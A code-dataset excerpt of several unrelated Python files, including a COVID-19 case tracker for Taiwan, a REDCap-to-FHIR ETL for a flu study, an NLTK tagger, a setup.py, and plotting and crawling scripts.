apple_cell_renderer = SquareGrid._circle_cell_renderer(r, cell_pixels)
self.apples.render(apple_cell_renderer)
r.pop()
@staticmethod
def _square_cell_renderer(r, cell_pixels):
points = (
(0, cell_pixels),
(cell_pixels, cell_pixels),
(cell_pixels, 0),
(0, 0)
)
def cell_renderer(p, color):
x, y = p
r.push()
r.setLineColor(*color)
r.setColor(*color)
r.translate(x * cell_pixels, y * cell_pixels)
r.drawPolygon(points)
r.pop()
return cell_renderer
@staticmethod
def _circle_cell_renderer(r, cell_pixels):
center_coordinate = cell_pixels / 2
circle_r = cell_pixels * 10 / 32
def cell_renderer(p, color):
x, y = p
r.push()
r.setLineColor(*color)
r.setColor(*color)
r.translate(x * cell_pixels, y * cell_pixels)
r.drawCircle(center_coordinate, center_coordinate, circle_r)
r.pop()
return cell_renderer
| 2.828125 | 3 |
covid19_tracker_taiwan.py | josephhuang08/Covid19_Tracker_Taiwan | 0 | 12757406 | <reponame>josephhuang08/Covid19_Tracker_Taiwan<filename>covid19_tracker_taiwan.py
import requests
import util
from datetime import datetime, timedelta
'''
data from 政府資料開放平台 衛生福利部疾病管制署
https://data.gov.tw/dataset/120711
Json query example:
{
"確定病名": "嚴重特殊傳染性肺炎",
"個案研判日": "2020/01/22",
"縣市": "空值",
"鄉鎮": "空值",
"性別": "女",
"是否為境外移入": "是",
"年齡層": "55-59",
"確定病例數": "1"
}
'''
#sort reported case numbers by cities and districrts
def sort_by_location(case_list):
#city_district is a nested dictionary
# {'縣市1': { '總共': '確診病例數', '鄉鎮1': '確診病例數', '鄉鎮2': '確診病例數', ... }
# '縣市2': { '總共': '確診病例數', '鄉鎮1': '確診病例數', '鄉鎮2': '確診病例數', ... }...}
city_district = {}
for case in case_list:
#store info of '縣市', 鄉鎮 and '確定病例數' in variables
city = case.get('縣市')
district = case.get('鄉鎮')
case_num = int(case.get('確定病例數'))
#create dictionary of citys and sub dictionary of districts
if city not in city_district:
city_district.update({city: {'總共': 0}})
if district not in city_district[city]:
city_district[city].update({district: 0})
#increment the case counter
city_district[city]['總共'] += case_num
city_district[city][district] += case_num
return city_district
def print_by_location(city_district):
for key, value in city_district.items():
print('{} 總確診: {}人'.format(key, value['總共']))
print('----------------------')
count = 0 # Print a new line for every 5 disticts
for count, district in enumerate(city_district[key].keys(), start = -1): # -1 is '總共'
if district != '總共':
if count % 5 == 0 and count != 0:
print('\n')
count = 0
print('{}: {:>4}\t'.format(district, city_district[key][district]), end = '')
if key == '空值':
print('\n*空值為本土疫情爆發前境外移入病例多於機場或\n集中檢疫所採檢確診並即隔離治療,故未標示其縣市資訊。\naka官方沒給資料', end = '')
print('\n\n')
def sort_by_gender(case_list):
gender_count = {'男': 0, '女': 0}
for case in case_list:
gender = case.get('性別')
case_num = int(case.get('確定病例數'))
if gender == '男':
gender_count['男'] += case_num
if gender == '女':
gender_count['女'] += case_num
return gender_count
def print_by_gender(gender_count):
total_cases = gender_count['男'] + gender_count['女']
print('總確診: {}人\n分別為 男性: {}人\t女性: {}人'.format(
total_cases, gender_count['男'], gender_count['女']))
#sort reported cases by age groups
def sort_by_age(case_list):
age_groups = {}
for case in case_list:
case_num = int(case.get('確定病例數'))
group = case.get('年齡層')
#check for the 3 types of age group and store as int for later on sorting
if len(group) == 1: #group 1: for age groups 0, 1, 2, 3, 4
temp = int(group)
elif '+' in group: #group 2: 70+
temp = 70
else: #group 3: other. Store first number in age group
temp = int(group.split('-')[0])
if temp not in age_groups:
age_groups.update({temp: 0})
age_groups[temp] += case_num
return age_groups
#print the age groups in decending order
def print_by_age(results):
print('年齡層\t 確診')
print('------\t ----')
for key, value in sorted(results.items(), reverse = True):
if key < 5:
print('{}\t{:>5}'.format(key, value))
elif key == 70:
print('{}+\t{:>5}'.format(key, value))
else:
print('{}-{}\t{:>5}'.format(key, key+5, value))
def sort_by_date(case_list): #TODO order by cases number
#nested dictionarys.
#days = {date1: {'本土案例': 0, '境外移入': 0},
# date2: {'本土案例': 0, '境外移入': 0}...}
days = {}
months = {}
#counting
for case in case_list:
y2_m2_d2 = case.get('個案研判日') #year/month/day
y1_m1 = y2_m2_d2[:-3] #year/month
case_num = int(case.get('確定病例數'))
if y2_m2_d2 not in days:
days.update({y2_m2_d2: {'本土案例': 0, '境外移入': 0}})
if y1_m1 not in months:
months.update({y1_m1: {'本土案例': 0, '境外移入': 0}})
#store the info '是否為境外移入' in seperate sub dictionarys
if case['是否為境外移入'] == '是':
days[y2_m2_d2]['境外移入'] += case_num
months[y1_m1]['境外移入'] += case_num
else:
days[y2_m2_d2]['本土案例'] += case_num
months[y1_m1]['本土案例'] += case_num
return months, days
#print the results of sort_by_day()
def print_by_date(months, days):
#print months
for y1_m1, value in months.items(): #y1_m1 = 2020/06
y1, m1 = y1_m1.split('/')
print('{}年{}月: [本土案例 {}\t境外移入 {}]'.format(
y1, m1, value['本土案例'], value['境外移入']))
print('-----------')
#print days
for y2_m2_d2, value in days.items(): #y2_m2_d2 = 2020/06/15
y2_m2, d2 = y2_m2_d2[:-3], y2_m2_d2[-2:]
if y1_m1 == y2_m2:
print('{}日: 本土案例 {:>3}\t境外移入 {:>2}'.format(
d2, value['本土案例'], value['境外移入']))
print('')
def summary_today(case_list):
#get data for today from sort_by_date()
_, day = sort_by_date(case_list)
key, value = list(day.items())[0]
total_case_num = value['本土案例'] + value['境外移入']
print('{} 疫情資料\n---------------------'.format(key))
print('總確診: {}\t[本土案例: {} 境外移入: {}]\n'.format(total_case_num, value['本土案例'], value['境外移入']))
city_district = sort_by_location(case_list)
print_by_location(city_district)
age_groups = sort_by_age(case_list)
print_by_age(age_groups)
def average_xdays(case_list, x):
#count the average case number of x days
l_sum, f_sum = 0, 0
_, days = sort_by_date(case_list)
for value in days.values():
l_sum += value['本土案例']
f_sum += value['境外移入']
l_avg, f_avg = l_sum / x, f_sum / x
t_avg = l_avg + f_avg
#get date(yyyy/mm/dd) of first and last day
first = (datetime.today() - timedelta(x)).strftime('%Y/%m/%d')
last = (datetime.today() - timedelta(1)).strftime('%Y/%m/%d')
print('[{} - {}] {}天的平均確診數'.format(first, last, x))
print('-----------------------------------------')
print('每日平均確診: {:.2f}\t[本土案例: {:.2f} 境外移入: {:.2f}]\n'.format(t_avg, l_avg, f_avg))
#get the x day average for each city
print('各縣市\n------')
city_district = sort_by_location(case_list)
for key, value in city_district.items():
c_avg = int(value['總共']) / x
print('{}:\t{:>5.2f}'.format(key, c_avg))
print('')
#get the x day average for each age group
age_groups = sort_by_age(case_list)
for key, value in age_groups.items():
value = round(value / x, 2)
age_groups.update({key: value})
print_by_age(age_groups)
def get_results(choice, data, first):
'''
get_results will handles user's choice with according funtions.
It will print the results then prompt the user for whether to write
the results in a txt file. Parament first is used to determine if the
function is ran for the first time.
'''
if choice == 1: #昨日疫情資料
if first:
input_date = (datetime.today() - timedelta(1)).strftime('%Y/%m/%d')
data = util.get_subset(data, input_date)
if data:
summary_today(data)
else:
print('昨日資料尚未發布')
elif choice == 2: #近x日平均數據
if first:
x = int(input('輸入(x): '))
input_date = (datetime.today() - timedelta(x)).strftime('%Y/%m/%d')
data = util.get_subset(data, input_date)
average_xdays(data, x)
util.write_to_txt(average_xdays, input_date, data, x)
else:
if first:
#get a subset of data using user's input date
input_date = input('輸入日期 格式[yyyy/mm/dd] (查看所有歷史資料輸入 0): ')
print('')
if input_date != '0':
data = util.get_subset(data, input_date)
if data:
if choice == 3: #縣市與鄉鎮
results = sort_by_location(data)
print_by_location(results)
if choice == 4: #性別
results = sort_by_gender(data)
print_by_gender(results)
if choice == 5: #年齡層
results = sort_by_age(data)
print_by_age(results)
if choice == 6: #日期
months, days = sort_by_date(data)
print_by_date(months, days)
else:
print('無資料,檢查輸入日期有無誤。')
if first and choice != 2:
util.write_to_txt(get_results, input_date, choice, data, False)
def main():
#get data and convert to json
res = requests.get('https://od.cdc.gov.tw/eic/Day_Confirmation_Age_County_Gender_19CoV.json')
data = res.json()
while True:
#choose content
print('\n本資料集每日依系統固定排程更新一次,呈現截至前一日之統計資訊。')
print('1 - 昨日疫情資料')
print('2 - 近x日平均數據\n')
print('依類別收尋資料:')
print('3 - 縣市與鄉鎮')
print('4 - 性別&總確診數')
print('5 - 年齡層')
print('6 - 日期')
print('9 - 中斷程式')
choice = int(input('輸入: '))
if choice == 9:
break
get_results(choice, data, True)
if __name__ == '__main__':
main() | 2.984375 | 3 |
lib/seattleflu/id3c/cli/command/etl/redcap_det_asymptomatic_swab_n_send.py | seattleflu/id3c-customizations | 4 | 12757407 | """
Process REDCap DETs that are specific to the
Seattle Flu Study - Swab and Send - Asymptomatic Enrollments
"""
import re
import click
import json
import logging
from uuid import uuid4
from typing import Any, Callable, Dict, List, Mapping, Match, Optional, Union, Tuple
from datetime import datetime
from cachetools import TTLCache
from id3c.db.session import DatabaseSession
from id3c.cli.redcap import Record as REDCapRecord
from id3c.cli.command.etl import redcap_det
from id3c.cli.command.geocode import get_geocoded_address
from id3c.cli.command.location import location_lookup
from seattleflu.id3c.cli.command import age_ceiling
from .redcap_map import *
from .fhir import *
from . import race, first_record_instance, required_instruments
LOG = logging.getLogger(__name__)
REVISION = 2
REDCAP_URL = 'https://redcap.iths.org/'
INTERNAL_SYSTEM = "https://seattleflu.org"
UW_CENSUS_TRACT = '53033005302'
PROJECT_ID = 20190
REQUIRED_INSTRUMENTS = [
'consent_form',
'shipping_information',
'back_end_mail_scans',
'day_0_enrollment_questionnaire',
'post_collection_data_entry_qc'
]
@redcap_det.command_for_project(
"asymptomatic-swab-n-send",
redcap_url = REDCAP_URL,
project_id = PROJECT_ID,
revision = REVISION,
help = __doc__)
@first_record_instance
@required_instruments(REQUIRED_INSTRUMENTS)
def redcap_det_asymptomatic_swab_n_send(*, db: DatabaseSession, cache: TTLCache, det: dict, redcap_record: REDCapRecord) -> Optional[dict]:
location_resource_entries = locations(db, cache, redcap_record)
patient_entry, patient_reference = create_patient(redcap_record)
if not patient_entry:
LOG.warning("Skipping enrollment with insufficient information to construct patient")
return None
encounter_entry, encounter_reference = create_encounter(redcap_record, patient_reference, location_resource_entries)
if not encounter_entry:
LOG.warning("Skipping enrollment with insufficient information to construct an encounter")
return None
questionnaire_entry = create_questionnaire_response(redcap_record, patient_reference, encounter_reference)
specimen_entry, specimen_reference = create_specimen(redcap_record, patient_reference)
if not specimen_entry:
LOG.warning("Skipping enrollment with insufficent information to construct a specimen")
return None
specimen_observation_entry = create_specimen_observation_entry(specimen_reference, patient_reference, encounter_reference)
resource_entries = [
patient_entry,
encounter_entry,
questionnaire_entry,
specimen_entry,
*location_resource_entries,
specimen_observation_entry
]
return create_bundle_resource(
bundle_id = str(uuid4()),
timestamp = datetime.now().astimezone().isoformat(),
source = f"{REDCAP_URL}{PROJECT_ID}/{redcap_record['record_id']}",
entries = list(filter(None, resource_entries))
)
def locations(db: DatabaseSession, cache: TTLCache, record: dict) -> list:
""" Creates a list of Location resource entries from a REDCap record. """
housing_type = 'residence'
address = {
'street': record['home_street'],
'secondary': None,
'city': record['homecity_other'],
'state': record['home_state'],
'zipcode': record['home_zipcode_2'],
}
lat, lng, canonicalized_address = get_geocoded_address(address, cache)
if not canonicalized_address:
return [] # TODO
tract_location = residence_census_tract(db, (lat, lng), housing_type)
# TODO what if tract_location is null?
tract_full_url = generate_full_url_uuid()
tract_entry = create_resource_entry(tract_location, tract_full_url)
address_hash = generate_hash(canonicalized_address)
address_location = create_location(
f"{INTERNAL_SYSTEM}/location/address",
address_hash,
housing_type,
tract_full_url
)
address_entry = create_resource_entry(address_location, generate_full_url_uuid())
return [tract_entry, address_entry]
def create_location(system: str, value: str, location_type: str, parent: str=None) -> dict:
""" Returns a FHIR Location resource. """
location_type_system = "http://terminology.hl7.org/CodeSystem/v3-RoleCode"
location_type_map = {
"residence": "PTRES",
"school": "SCHOOL",
"work": "WORK",
"site": "HUSCS",
"lodging": "PTLDG",
}
location_type_cc = create_codeable_concept(location_type_system,
location_type_map[location_type])
location_identifier = create_identifier(system, value)
part_of = None
if parent:
part_of = create_reference(reference_type="Location", reference=parent)
return create_location_resource([location_type_cc], [location_identifier], part_of)
def create_patient(record: dict) -> tuple:
""" Returns a FHIR Patient resource entry and reference. """
gender = map_sex(record["sex"])
patient_id = generate_patient_hash(
names = (record['participant_first_name'], record['participant_last_name']),
gender = gender,
birth_date = record['birthday'],
postal_code = record['home_zipcode_2'])
if not patient_id:
# Some piece of information was missing, so we couldn't generate a
# hash. Fallback to treating this individual as always unique by using
# the REDCap record id.
patient_id = generate_hash(f"{REDCAP_URL}{PROJECT_ID}/{record['record_id']}")
LOG.debug(f"Generated individual identifier {patient_id}")
patient_identifier = create_identifier(f"{INTERNAL_SYSTEM}/individual", patient_id)
patient_resource = create_patient_resource([patient_identifier], gender)
return create_entry_and_reference(patient_resource, "Patient")
def create_encounter(record: REDCapRecord, patient_reference: dict, locations: list) -> tuple:
""" Returns a FHIR Encounter resource entry and reference """
def grab_symptom_keys(key: str) -> Optional[Match[str]]:
if record[key] != '':
return re.match('symptoms___[0-9]{1,3}$', key)
else:
return None
def build_conditions_list(symptom_key: str) -> dict:
return create_resource_condition(record[symptom_key], patient_reference)
def build_diagnosis_list(symptom_key: str) -> Optional[dict]:
mapped_symptom = map_symptom(record[symptom_key])
if not mapped_symptom:
return None
return { "condition": { "reference": f"#{mapped_symptom}" } }
def build_locations_list(location: dict) -> dict:
return {
"location": create_reference(
reference_type = "Location",
reference = location["fullUrl"]
)
}
def non_tract_locations(resource: dict):
return bool(resource) \
and resource['resource']['identifier'][0]['system'] != f"{INTERNAL_SYSTEM}/location/tract"
symptom_keys = list(filter(grab_symptom_keys, record))
contained = list(filter(None, map(build_conditions_list, symptom_keys)))
diagnosis = list(filter(None, map(build_diagnosis_list, symptom_keys)))
encounter_identifier = create_identifier(
system = f"{INTERNAL_SYSTEM}/encounter",
value = f"{REDCAP_URL}{PROJECT_ID}/{record['record_id']}"
)
encounter_class_coding = create_coding(
system = "http://terminology.hl7.org/CodeSystem/v3-ActCode",
code = "HH"
)
encounter_date = record['enrollment_date']
if not encounter_date:
return None, None
non_tracts = list(filter(non_tract_locations, locations))
non_tract_references = list(map(build_locations_list, non_tracts))
# Site for all swab 'n send Encounters is 'swabNSend'
site_reference = {
"location": create_reference(
reference_type = "Location",
identifier = create_identifier(f"{INTERNAL_SYSTEM}/site", 'swabNSend')
)
}
non_tract_references.append(site_reference)
encounter_resource = create_encounter_resource(
encounter_source = create_redcap_uri(record),
encounter_identifier = [encounter_identifier],
encounter_class = encounter_class_coding,
encounter_date = encounter_date,
patient_reference = patient_reference,
location_references = non_tract_references,
diagnosis = diagnosis,
contained = contained
)
return create_entry_and_reference(encounter_resource, "Encounter")
def create_resource_condition(symptom_name: str, patient_reference: dict) -> Optional[dict]:
""" Returns a FHIR Condition resource. """
mapped_symptom_name = map_symptom(symptom_name)
if not mapped_symptom_name:
return None
# XXX TODO: Define this as a TypedDict when we upgrade from Python 3.6 to
# 3.8. Until then, there's no reasonable way to type this data structure
# better than Any.
# -trs, 24 Oct 2019
condition: Any = {
"resourceType": "Condition",
"id": mapped_symptom_name,
"code": {
"coding": [
{
"system": f"{INTERNAL_SYSTEM}/symptom",
"code": mapped_symptom_name
}
]
},
"subject": patient_reference
}
return condition
def create_specimen(record: dict, patient_reference: dict) -> tuple:
""" Returns a FHIR Specimen resource entry and reference """
def specimen_barcode(record: Any) -> str:
"""
Given a REDCap *record*, returns the barcode or corrected barcode if it
exists.
"""
barcode = record['return_utm_barcode'] or record['pre_scan_barcode']
if not barcode:
barcode = record['utm_tube_barcode']
reentered_barcode = record['reenter_barcode']
if record['check_barcodes'] == "No":
#TODO: Figure out why 'corrected_barcode' doesn't always exist?
barcode = record.get('corrected_barcode')
return barcode
barcode = specimen_barcode(record)
if not barcode:
LOG.warning("Could not create Specimen Resource due to lack of barcode.")
return None, None
specimen_identifier = create_identifier(
system = f"{INTERNAL_SYSTEM}/sample",
value = barcode
)
# YYYY-MM-DD in REDCap
collected_time = record['collection_date'] or None
# YYYY-MM-DD
received_time = record['samp_process_date'] or None
specimen_type = 'NSECR' # Nasal swab. TODO we may want shared mapping function
specimen_resource = create_specimen_resource(
[specimen_identifier], patient_reference, specimen_type, received_time, collected_time
)
return create_entry_and_reference(specimen_resource, "Specimen")
def create_questionnaire_response(record: dict, patient_reference: dict,
encounter_reference: dict) -> Optional[dict]:
""" Returns a FHIR Questionnaire Response resource entry. """
def create_custom_coding_key(coded_question: str, record: dict) -> Optional[List]:
"""
Handles the 'race' edge case by combining "select all that apply"-type
responses into one list.
"""
coded_keys = list(filter(lambda r: grab_coding_keys(coded_question, r), record))
coded_names = list(map(lambda k: record[k], coded_keys))
if coded_question == 'race':
return race(coded_names)
return None
def grab_coding_keys(coded_question: str, key: str) -> Optional[Match[str]]:
if record[key] == '':
return None
return re.match(f'{coded_question}___[0-9]+$', key)
def build_questionnaire_items(question: str) -> Optional[dict]:
return questionnaire_item(record, question, category)
coding_questions = [
'race'
]
boolean_questions = [
'hispanic',
'travel_states',
'travel_countries',
]
integer_questions = [
'age',
'age_months',
]
string_questions = [
'education',
'samp_process_date',
]
question_categories = {
'valueCoding': coding_questions,
'valueBoolean': boolean_questions,
'valueInteger': integer_questions,
'valueString': string_questions,
}
# Do some pre-processing
record['race'] = create_custom_coding_key('race', record)
record['age'] = age_ceiling(int(record['age']))
record['age_months'] = age_ceiling(int(record['age_months']) / 12) * 12
items: List[dict] = []
for category in question_categories:
category_items = list(map(build_questionnaire_items, question_categories[category]))
for item in category_items:
if item:
items.append(item)
# Handle edge cases
vaccine_item = vaccine(record)
if vaccine_item:
items.append(vaccine_item)
if items:
questionnaire_reseponse_resource = create_questionnaire_response_resource(
patient_reference, encounter_reference, items
)
full_url = generate_full_url_uuid()
return create_resource_entry(questionnaire_reseponse_resource, full_url)
return None
def questionnaire_item(record: dict, question_id: str, response_type: str) -> Optional[dict]:
""" Creates a QuestionnaireResponse internal item from a REDCap record. """
response = record[question_id]
def cast_to_coding(string: str):
""" Currently the only QuestionnaireItem we code is race. """
return create_coding(
system = f"{INTERNAL_SYSTEM}/race",
code = string,
)
def cast_to_string(string: str) -> Optional[str]:
if string != '':
return string
return None
def cast_to_integer(string: str) -> Optional[int]:
try:
return int(string)
except ValueError:
return None
def cast_to_boolean(string: str) -> Optional[bool]:
if string == 'Yes':
return True
elif re.match(r'^No($|,[\w\s\'\.]*)$', string): # Starts with "No", has optional comma and text
return False
return None
def build_response_answers(response: Union[str, List]) -> List:
answers = []
if not isinstance(response, list):
response = [response]
for item in response:
type_casted_item = casting_functions[response_type](item)
# cast_to_boolean can return False, so must be `is not None`
if type_casted_item is not None:
answers.append({ response_type: type_casted_item })
return answers
casting_functions: Mapping[str, Callable[[str], Any]] = {
'valueCoding': cast_to_coding,
'valueInteger': cast_to_integer,
'valueBoolean': cast_to_boolean,
'valueString': cast_to_string,
}
answers = build_response_answers(response)
if answers:
return create_questionnaire_response_item(question_id, answers)
return None
def vaccine(record: Any) -> Optional[dict]:
"""
For a given *record*, return a questionnaire response item with the vaccine
response(s) encoded.
"""
vaccine_status = map_vaccine(record["vaccine"])
if vaccine_status is None:
return None
answers: List[Dict[str, Any]] = [{ 'valueBoolean': vaccine_status }]
date = vaccine_date(record)
if vaccine_status and date:
answers.append({ 'valueDate': date })
return create_questionnaire_response_item('vaccine', answers)
def vaccine_date(record: dict) -> Optional[str]:
""" Converts a vaccination date to 'YYYY' or 'YYYY-MM' format. """
year = record['vaccine_year']
month = record['vaccine_1']
if year == '' or year == 'Do not know':
return None
if month == 'Do not know':
return datetime.strptime(year, '%Y').strftime('%Y')
return datetime.strptime(f'{month} {year}', '%B %Y').strftime('%Y-%m')
def residence_census_tract(db: DatabaseSession, lat_lng: Tuple[float, float],
housing_type: str) -> Optional[dict]:
"""
Creates a new Location Resource for the census tract containing the given
*lat_lng* coordintes and associates it with the given *housing_type*.
"""
location = location_lookup(db, lat_lng, 'tract')
if location and location.identifier:
return create_location(
f"{INTERNAL_SYSTEM}/location/tract", location.identifier, housing_type
)
else:
LOG.warning("No census tract found for given location.")
return None
| 2.109375 | 2 |
main/find_pos.py | TechnicallyMay/mad_libs_generator | 0 | 12757408 | import nltk
import re
import string
from collections import defaultdict
nltk.download("punkt")
nltk.download('averaged_perceptron_tagger')
def tag_pos(text):
tokens = nltk.word_tokenize(text)
tagged = nltk.pos_tag(tokens)
clean = remove_punctuation(tagged)
sorted = sort_by_pos(clean)
return sorted
def remove_punctuation(tagged_text):
no_punct = []
regex = re.compile('[%s]' % string.punctuation)
for word, pos in tagged_text:
clean = regex.sub("", word).lower()
no_punct.append((clean, pos))
return no_punct
def sort_by_pos(tokens):
parts_of_speech = defaultdict(list)
punct = string.punctuation
for word, tag in tokens:
if len(word) > 2:
parts_of_speech[tag].append(word)
return parts_of_speech
| 3.125 | 3 |
bestmoments/admin.py | randomowo/randomowo.ru | 0 | 12757409 | """
"""
from django.contrib import admin
from bestmoments.models import BestImage
from bestmoments.models import WebmVideo
class BestImageAdmin(admin.ModelAdmin):
"""
"""
list_display = ["image"]
class WebmVideoAdmin(admin.ModelAdmin):
"""
"""
list_display = ["video"]
admin.site.register(BestImage, BestImageAdmin)
admin.site.register(WebmVideo, WebmVideoAdmin)
| 1.789063 | 2 |
setup.py | grodriguezl/intelmq-webinput-csv | 0 | 12757410 | <reponame>grodriguezl/intelmq-webinput-csv
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2017-2018 nic.at GmbH <<EMAIL>>
# SPDX-License-Identifier: AGPL-3.0
import os
from setuptools import find_packages, setup
DATA = [
('/opt/intelmq/etc/examples',
['intelmq_webinput_csv/etc/webinput_csv.conf',
],
),
]
exec(open(os.path.join(os.path.dirname(__file__),
'intelmq_webinput_csv/version.py')).read()) # defines __version__
with open(os.path.join(os.path.dirname(__file__), 'README.rst')) as handle:
README = handle.read().replace('<docs/',
'<https://github.com/certat/intelmq-webinput-csv/blob/master/docs/')
folders = []
for r, d, f in os.walk(os.path.join(os.path.dirname(__file__),'intelmq_webinput_csv')):
folders.append(r + '/*')
setup(
name='intelmq_webinput_csv',
version=__version__,
maintainer='<NAME>',
maintainer_email='<EMAIL>',
install_requires=[
'Flask',
'intelmq',
],
test_suite='intelmq_webinput_csv.tests',
packages=find_packages(),
package_data={
'intelmq_webinput_csv': folders
},
include_package_data=True,
url='https://github.com/certat/intelmq_webinput_csv/',
license='AGPLv3 and MIT and OFL-1.1',
description='This is a Flask-based web interface allowing the user to '
'insert data into intelmq\'s pipelines interactively with '
'preview from the parser.',
long_description=README,
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Framework :: Flask',
'Intended Audience :: Information Technology',
'Intended Audience :: System Administrators',
'Intended Audience :: Telecommunications Industry',
'License :: OSI Approved :: GNU Affero General Public License v3',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Security',
],
keywords='incident handling cert csirt',
data_files=DATA,
entry_points={
'console_scripts': [
'intelmq_webinput_csv=intelmq_webinput_csv.bin.backend:main',
],
},
)
| 1.609375 | 2 |
newss.py | windn19/Svod1 | 0 | 12757411 | <filename>newss.py
import os
from cleaning import clear_file
lands = ['ru', 'uk', 'fr', 'de']
for i in range(4):
clear_file(f'data/data_{lands[i]}.json')
os.system(f'python3.7 -m scrapy runspider auto_{lands[i]}.py --output=data/data_{lands[i]}.json -L WARNING')
print(f'{lands[i]} -- ok')
os.system('python3.7 render.py')
os.system('xdg-open index.html')
| 2.5 | 2 |
crawl_data.py | Sharad24/NeurIPS2021Datasets-OpenReviewData | 493 | 12757412 | <gh_stars>100-1000
import numpy as np
import h5py
import string
from util import crawl_meta
import time
CRAWL_DATA = True
AFTER_DECISION = False
CRAWL_REVIEW = True
# Get the meta data
meta_list = crawl_meta(
meta_hdf5=None,
write_meta_name='data_{}.hdf5'.format(time.strftime("%Y%m%d%H%M%S")),
crawl_review=CRAWL_REVIEW)
num_withdrawn = len([m for m in meta_list if m.withdrawn or m.desk_reject])
print('Number of submissions: {} (withdrawn/desk reject submissions: {})'.format(
len(meta_list), num_withdrawn))
| 2.640625 | 3 |
python/dataingest/grammar/bp/python_parse_api.py | jiportilla/ontology | 0 | 12757413 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import os
import pandas as pd
from pandas import DataFrame
from tabulate import tabulate
from base import BaseObject
class PythonParseAPI(BaseObject):
""" API (Orchestrator) for Python Dependency Parsing
"""
def __init__(self,
is_debug: bool = False):
"""
Created:
6-Dec-2019
<EMAIL>
* https://github.ibm.com/GTS-CDO/unstructured-analytics/issues/1535
Updated:
24-Dec-2019
<EMAIL>
* refactored in pursuit of
https://github.ibm.com/GTS-CDO/unstructured-analytics/issues/1637#issuecomment-16802191
* also refactored in pursuit of
https://github.ibm.com/GTS-CDO/unstructured-analytics/issues/1642#issuecomment-16802836
:param is_debug:
"""
BaseObject.__init__(self, __name__)
self._is_debug = is_debug
self._base_path = os.environ["CODE_BASE"]
def _to_file(self,
df: DataFrame,
collection_type: str) -> None:
from dataingest.grammar.dmo import CollectionNameGenerator
from dataingest.grammar.svc import PerformPythonTransformation
gen_name = CollectionNameGenerator(is_debug=self._is_debug)
collection_name = gen_name.process(collection_type)
PerformPythonTransformation(df_parse=df,
is_debug=self._is_debug,
collection_name=collection_name).process()
def process(self):
from dataingest.grammar.svc import ParsePythonFiles
from dataingest.grammar.svc import ParsePythonImports
from dataingest.grammar.dmo import PythonDirectoryLoader
directory_path = f"{self._base_path}/workspace"
files = PythonDirectoryLoader(is_debug=self._is_debug,
directory_path=directory_path).process()
df_files = ParsePythonFiles(files=files,
is_debug=self._is_debug).process()
if df_files is None:
self.logger.warning("No Results Found")
return
d_imports = ParsePythonImports(files=files,
df_files=df_files,
is_debug=self._is_debug).process()
self._to_file(df_files, "src")
self._to_file(d_imports["internal"], "int-import")
self._to_file(d_imports["external"], "ext-import")
def load(self,
date: str):
def _input_path(file_name: str) -> str:
return os.path.join(os.environ["CODE_BASE"],
"resources/output/transform",
file_name)
def _to_dataframe(collection_type: str,
input_path: str) -> DataFrame:
df = pd.read_csv(input_path, sep='\t', encoding='utf-8')
if self._is_debug:
self.logger.debug('\n'.join([
f"Imported {collection_type} Collection",
f"\tTotal Records: {len(df)}",
f"\tInput Path: {input_path}",
tabulate(df.sample(3), tablefmt='psql', headers='keys')]))
return df
class Facade(object):
@staticmethod
def imports():
class ImportsFacade(object):
@staticmethod
def internal() -> DataFrame:
input_path = _input_path(f"parse_unstrut-int-import_{date}.csv")
return _to_dataframe("Internal Imports", input_path)
@staticmethod
def external() -> DataFrame:
input_path = _input_path(f"parse_unstrut-ext-import_{date}.csv")
return _to_dataframe("External Imports", input_path)
return ImportsFacade()
@staticmethod
def source() -> DataFrame:
input_path = _input_path(f"parse_unstrut-src_{date}.csv")
return _to_dataframe("Source", input_path)
return Facade()
def main():
PythonParseAPI(is_debug=False).process()
if __name__ == "__main__":
import plac
plac.call(main)
| 2.171875 | 2 |
5_neurons_phase_reset/xpp_to_py.py | helene-todd/XPPAUT_code | 0 | 12757414 | <reponame>helene-todd/XPPAUT_code
import matplotlib.pyplot as plt
from matplotlib import cm, rcParams
from matplotlib.ticker import FormatStrFormatter
import numpy as np
import math as math
import random as rand
import os
import csv
rcParams.update({'figure.autolayout': True})
# Button palette
c = ['#aa3863', '#d97020', '#ef9f07', '#449775', '#3b7d86']
times_plot1, times_plot2, times_plot3 = [], [], []
V1_plot1, V1_plot2, V1_plot3 = [], [], []
V2_plot1, V2_plot2, V2_plot3 = [], [], []
V3_plot1, V3_plot2, V3_plot3 = [], [], []
V4_plot1, V4_plot2, V4_plot3 = [], [], []
V5_plot1, V5_plot2, V5_plot3 = [], [], []
I_plot1, I_plot2, I_plot3 = [], [], []
Vth = 1
Vr = 0
fig, ax = plt.subplots(2, 1, figsize=(16,6), sharey='row')
with open('synchro.dat', newline='') as file:
datareader = csv.reader(file, delimiter=' ')
for row in datareader:
if float(row[0]) >= 20 and float(row[0]) <= 52.5 :
times_plot1.append(float(row[0]))
V1_plot1.append(float(row[1]))
V2_plot1.append(float(row[2]))
V3_plot1.append(float(row[3]))
V4_plot1.append(float(row[4]))
V5_plot1.append(float(row[5]))
I_plot1.append(float(row[6]))
ax[0].plot(times_plot1, I_plot1, alpha=0.75, color='red', linestyle='-', label='Neurons 1 & 2')
ax[0].plot(times_plot1, I_plot1[0]*np.ones(len(times_plot1)), alpha=0.75, color='blue', linestyle='-', label='Neurons 3, 4 & 5')
ax[1].plot(times_plot1, V1_plot1, alpha=0.75, color=c[0], linestyle='-', label='$V_1$')
ax[1].plot(times_plot1, V2_plot1, alpha=0.75, color=c[1], linestyle='-', label='$V_2$')
ax[1].plot(times_plot1, V3_plot1, alpha=0.75, color=c[2], linestyle='-', label='$V_3$')
ax[1].plot(times_plot1, V4_plot1, alpha=0.75, color=c[3], linestyle='-', label='$V_4$')
ax[1].plot(times_plot1, V5_plot1, alpha=0.75, color=c[4], linestyle='-', label='$V_5$')
# A spike occurs iff there was a reset
# Plot 1
spike_times_V1_plot1 = [times_plot1[i] for i in range(1,len(V1_plot1)) if abs(V1_plot1[i]-V1_plot1[i-1]) > (Vth-Vr)/2]
spike_times_V2_plot1 = [times_plot1[i] for i in range(1,len(V2_plot1)) if abs(V2_plot1[i]-V2_plot1[i-1]) > (Vth-Vr)/2]
